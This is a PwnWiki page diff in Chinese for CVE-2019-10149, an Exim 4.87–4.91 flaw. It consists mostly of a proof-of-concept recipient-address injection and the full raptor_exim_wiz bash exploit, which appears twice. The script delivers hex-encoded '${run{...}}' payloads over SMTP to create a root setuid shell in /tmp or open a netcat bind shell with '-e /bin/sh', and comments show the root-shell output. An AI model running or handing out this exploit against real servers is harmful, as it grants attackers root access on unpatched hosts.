Difference between revisions of "CVE-2019-10149 Exim郵箱服務漏洞"
From PwnWiki
(Created page with "<languages /> ==POC== <pre> 'RCPT TO "${run{...}}@relaydomain.com"' </pre> <pre> noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com </pre>") |
|||
| (2 intermediate revisions by 2 users not shown) | |||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
| + | |||
| + | == '''影響範圍''' == | ||
| + | Exim 版本 4.87 至 4.91 | ||
| + | |||
==POC== | ==POC== | ||
<pre> | <pre> | ||
| Line 9: | Line 13: | ||
noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com | noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com | ||
</pre> | </pre> | ||
| + | |||
| + | |||
| + | ==EXP== | ||
| + | <pre> | ||
| + | #!/bin/bash | ||
| + | |||
| + | # | ||
| + | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit | ||
| + | # Copyright (c) 2019 Marco Ivaldi <[email protected]> | ||
| + | # | ||
| + | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). | ||
| + | # Improper validation of recipient address in deliver_message() | ||
| + | # function in /src/deliver.c may lead to remote command execution. | ||
| + | # (CVE-2019-10149) | ||
| + | # | ||
| + | # This is a local privilege escalation exploit for "The Return | ||
| + | # of the WIZard" vulnerability reported by the Qualys Security | ||
| + | # Advisory team. | ||
| + | # | ||
| + | # Credits: | ||
| + | # Qualys Security Advisory team (kudos for your amazing research!) | ||
| + | # Dennis 'dhn' Herrmann (/dev/tcp technique) | ||
| + | # | ||
| + | # Usage (setuid method): | ||
| + | # $ id | ||
| + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] | ||
| + | # $ ./raptor_exim_wiz -m setuid | ||
| + | # Preparing setuid shell helper... | ||
| + | # Delivering setuid payload... | ||
| + | # [...] | ||
| + | # Waiting 5 seconds... | ||
| + | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned | ||
| + | # # id | ||
| + | # uid=0(root) gid=0(root) groups=0(root) | ||
| + | # | ||
| + | # Usage (netcat method): | ||
| + | # $ id | ||
| + | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] | ||
| + | # $ ./raptor_exim_wiz -m netcat | ||
| + | # Delivering netcat payload... | ||
| + | # Waiting 5 seconds... | ||
| + | # localhost [127.0.0.1] 31337 (?) open | ||
| + | # id | ||
| + | # uid=0(root) gid=0(root) groups=0(root) | ||
| + | # | ||
| + | # Vulnerable platforms: | ||
| + | # Exim 4.87 - 4.91 | ||
| + | # | ||
| + | # Tested against: | ||
| + | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] | ||
| + | # | ||
| + | |||
| + | METHOD="setuid" # default method | ||
| + | PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' | ||
| + | PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' | ||
| + | |||
| + | # usage instructions | ||
| + | function usage() | ||
| + | { | ||
| + | echo "$0 [-m METHOD]" | ||
| + | echo | ||
| + | echo "-m setuid : use the setuid payload (default)" | ||
| + | echo "-m netcat : use the netcat payload" | ||
| + | echo | ||
| + | exit 1 | ||
| + | } | ||
| + | |||
| + | # payload delivery | ||
| + | function exploit() | ||
| + | { | ||
| + | # connect to localhost:25 | ||
| + | exec 3<>/dev/tcp/localhost/25 | ||
| + | |||
| + | # deliver the payload | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "helo localhost" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "mail from:<>" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "rcpt to:<$PAYLOAD>" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "data" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | for i in {1..31} | ||
| + | do | ||
| + | echo "Received: $i" >&3 | ||
| + | done | ||
| + | echo "." >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | echo "quit" >&3 | ||
| + | read -u 3 && echo $REPLY | ||
| + | } | ||
| + | |||
| + | # print banner | ||
| + | echo | ||
| + | echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' | ||
| + | echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' | ||
| + | echo | ||
| + | |||
| + | # parse command line | ||
| + | while [ ! -z "$1" ]; do | ||
| + | case $1 in | ||
| + | -m) shift; METHOD="$1"; shift;; | ||
| + | * ) usage | ||
| + | ;; | ||
| + | esac | ||
| + | done | ||
| + | if [ -z $METHOD ]; then | ||
| + | usage | ||
| + | fi | ||
| + | |||
| + | # setuid method | ||
| + | if [ $METHOD = "setuid" ]; then | ||
| + | |||
| + | # prepare a setuid shell helper to circumvent bash checks | ||
| + | echo "Preparing setuid shell helper..." | ||
| + | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c | ||
| + | gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null | ||
| + | if [ $? -ne 0 ]; then | ||
| + | echo "Problems compiling setuid shell helper, check your gcc." | ||
| + | echo "Falling back to the /bin/sh method." | ||
| + | cp /bin/sh /tmp/pwned | ||
| + | fi | ||
| + | echo | ||
| + | |||
| + | # select and deliver the payload | ||
| + | echo "Delivering $METHOD payload..." | ||
| + | PAYLOAD=$PAYLOAD_SETUID | ||
| + | exploit | ||
| + | echo | ||
| + | |||
| + | # wait for the magic to happen and spawn our shell | ||
| + | echo "Waiting 5 seconds..." | ||
| + | sleep 5 | ||
| + | ls -l /tmp/pwned | ||
| + | /tmp/pwned | ||
| + | |||
| + | # netcat method | ||
| + | elif [ $METHOD = "netcat" ]; then | ||
| + | |||
| + | # select and deliver the payload | ||
| + | echo "Delivering $METHOD payload..." | ||
| + | PAYLOAD=$PAYLOAD_NETCAT | ||
| + | exploit | ||
| + | echo | ||
| + | |||
| + | # wait for the magic to happen and spawn our shell | ||
| + | echo "Waiting 5 seconds..." | ||
| + | sleep 5 | ||
| + | nc -v 127.0.0.1 31337 | ||
| + | |||
| + | # print help | ||
| + | else | ||
| + | usage | ||
| + | fi | ||
| + | </pre> | ||
| + | |||
| + | == '''引用''' == | ||
| + | https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py | ||
Latest revision as of 23:05, 6 April 2021
影響範圍
Exim 版本 4.87 至 4.91
POC
'RCPT TO "${run{...}}@relaydomain.com"'
noob+${run{/usr/bin/touch /tmp/hello}}@myserver.com
EXP
#!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi
